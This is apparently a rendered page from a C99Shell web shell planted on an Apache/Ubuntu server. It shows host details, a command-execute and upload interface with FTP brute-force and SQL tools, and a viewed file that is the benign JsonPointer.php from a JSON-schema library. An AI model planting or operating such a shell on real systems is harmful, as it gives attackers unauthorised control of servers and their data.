!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/justinrainbow/json-schema/src/JsonSchema/Entity/   drwxrwxrwx
Free 13.19 GB of 57.97 GB (22.75%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     JsonPointer.php (3.31 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the JsonSchema package.
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace JsonSchema\Entity;

use 
JsonSchema\Exception\InvalidArgumentException;

/**
 * @package JsonSchema\Entity
 *
 * @author Joost Nijhuis <jnijhuis81@gmail.com>
 */
class JsonPointer
{
    
/** @var string */
    
private $filename;

    
/** @var string[] */
    
private $propertyPaths = array();

    
/**
     * @var bool Whether the value at this path was set from a schema default
     */
    
private $fromDefault false;

    
/**
     * @param string $value
     *
     * @throws InvalidArgumentException when $value is not a string
     */
    
public function __construct($value)
    {
        if (!
is_string($value)) {
            throw new 
InvalidArgumentException('Ref value must be a string');
        }

        
$splitRef explode('#'$value2);
        
$this->filename $splitRef[0];
        if (
array_key_exists(1$splitRef)) {
            
$this->propertyPaths $this->decodePropertyPaths($splitRef[1]);
        }
    }

    
/**
     * @param string $propertyPathString
     *
     * @return string[]
     */
    
private function decodePropertyPaths($propertyPathString)
    {
        
$paths = array();
        foreach (
explode('/'trim($propertyPathString'/')) as $path) {
            
$path $this->decodePath($path);
            if (
is_string($path) && '' !== $path) {
                
$paths[] = $path;
            }
        }

        return 
$paths;
    }

    
/**
     * @return array
     */
    
private function encodePropertyPaths()
    {
        return 
array_map(
            array(
$this'encodePath'),
            
$this->getPropertyPaths()
        );
    }

    
/**
     * @param string $path
     *
     * @return string
     */
    
private function decodePath($path)
    {
        return 
strtr($path, array('~1' => '/''~0' => '~''%25' => '%'));
    }

    
/**
     * @param string $path
     *
     * @return string
     */
    
private function encodePath($path)
    {
        return 
strtr($path, array('/' => '~1''~' => '~0''%' => '%25'));
    }

    
/**
     * @return string
     */
    
public function getFilename()
    {
        return 
$this->filename;
    }

    
/**
     * @return string[]
     */
    
public function getPropertyPaths()
    {
        return 
$this->propertyPaths;
    }

    
/**
     * @param array $propertyPaths
     *
     * @return JsonPointer
     */
    
public function withPropertyPaths(array $propertyPaths)
    {
        
$new = clone $this;
        
$new->propertyPaths $propertyPaths;

        return 
$new;
    }

    
/**
     * @return string
     */
    
public function getPropertyPathAsString()
    {
        return 
rtrim('#/' implode('/'$this->encodePropertyPaths()), '/');
    }

    
/**
     * @return string
     */
    
public function __toString()
    {
        return 
$this->getFilename() . $this->getPropertyPathAsString();
    }

    
/**
     * Mark the value at this path as being set from a schema default
     */
    
public function setFromDefault()
    {
        
$this->fromDefault true;
    }

    
/**
     * Check whether the value at this path was set from a schema default
     *
     * @return bool
     */
    
public function fromDefault()
    {
        return 
$this->fromDefault;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--